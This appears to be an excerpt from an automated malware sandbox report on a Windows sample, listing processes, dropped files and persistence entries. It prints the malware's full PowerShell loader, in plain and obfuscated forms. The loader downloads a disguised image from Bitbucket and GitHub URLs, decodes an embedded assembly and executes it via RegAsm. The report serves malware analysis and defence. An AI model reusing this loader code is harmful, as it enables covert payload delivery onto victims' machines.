txt.crijFkF/sdaolnwod/fwf/wfsfwf/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] (' txt.mpcfSnk/sdaolnwod/fwf/wfsfwf/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#CJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] (' txt.crijFkF/sdaolnwod/fwf/wfsfwf/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] (' txt.mpcfSnk/sdaolnwod/fwf/wfsfwf/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                      Source: 6706e721f2c06.exeStatic PE information: 0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeCode function: 0_2_00007FF7D2A630EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF7D2A630EC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF886EE095D push E95B7AD0h; ret 5_2_00007FF886EE09C9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00457186 push ecx; ret 33_2_00457199
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0045E55D push esi; ret 33_2_0045E566
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00457AA8 push eax; ret 33_2_00457AC6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00434EB6 push ecx; ret 33_2_00434EC9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_10002806 push ecx; ret 33_2_10002819
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_0044693D push ecx; ret 37_2_0044694D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_0044DB70 push eax; ret 37_2_0044DB84
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_0044DB70 push eax; ret 37_2_0044DBAC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_00451D54 push eax; ret 37_2_00451D61
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 38_2_0044B090 push eax; ret 38_2_0044B0A4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 38_2_0044B090 push eax; ret 38_2_0044B0CC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 38_2_00451D34 push eax; ret 38_2_00451D41
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 38_2_00444E71 push ecx; ret 38_2_00444E81
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 40_2_00414060 push eax; ret 40_2_00414074
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 40_2_00414060 push eax; ret 40_2_0041409C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 40_2_00414039 push ecx; ret 40_2_00414049
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 40_2_004164EB push 0000006Ah; retf 40_2_004165C4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 40_2_00416553 push 0000006Ah; retf 40_2_004165C4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 40_2_00416555 push 0000006Ah; retf 40_2_004165C4

                      Persistence and Installation Behavior

                      barindex
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\603423\Lucas.pifJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\603423\Lucas.pifFile created: C:\Users\user\AppData\Local\DesignInno Innovations\InnoCraft.scrJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00406EEB ShellExecuteW,URLDownloadToFileW,33_2_00406EEB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXEJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\legit[1].exeJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\603423\Lucas.pifJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\603423\Lucas.pifFile created: C:\Users\user\AppData\Local\DesignInno Innovations\InnoCraft.scrJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\payload[1].exeJump to dropped file
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeCode function: 0_2_00007FF7D2A61684 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00007FF7D2A61684
                      Source: C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exeCode function: 15_2_00007FF6363415F4 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,15_2_00007FF6363415F4
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoCraft.url
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoCraft.url
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,33_2_0041AADB
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
